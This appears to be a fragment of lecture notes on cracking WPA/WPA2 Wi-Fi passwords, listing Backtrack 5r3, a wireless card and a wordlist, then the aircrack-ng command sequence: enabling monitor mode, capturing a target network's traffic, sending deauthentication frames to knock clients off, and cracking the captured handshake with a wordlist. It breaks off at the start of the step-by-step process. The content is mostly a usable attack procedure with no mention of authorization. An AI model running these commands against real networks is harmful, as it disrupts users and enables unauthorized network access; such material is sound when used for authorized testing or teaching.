This lecture is about
wpa\wpa2 cracking.
Requirements for WPA\wpa2
cracking:
1= Backtrack 5r3
2= WiFi device
3= world-list file
The commands which we will
need in wpa\wpa2 cracking are as under:
1= Airmon-ng
2= Airmon-ng start wlan0
3= Airodump-ng mon0
4= Airodump-ng -c (
channel ) -w ( file name to rite captured packets ) --bssid (bssid of network)
mon0
5= Aireplay-ng --deauth 1
-a (bssid) mon0
6= Aircrack-ng (file name)
-w( drag worldlist file )
Process . . . .
1= Open terminal and type
first command:
Airmon-ng :
2=...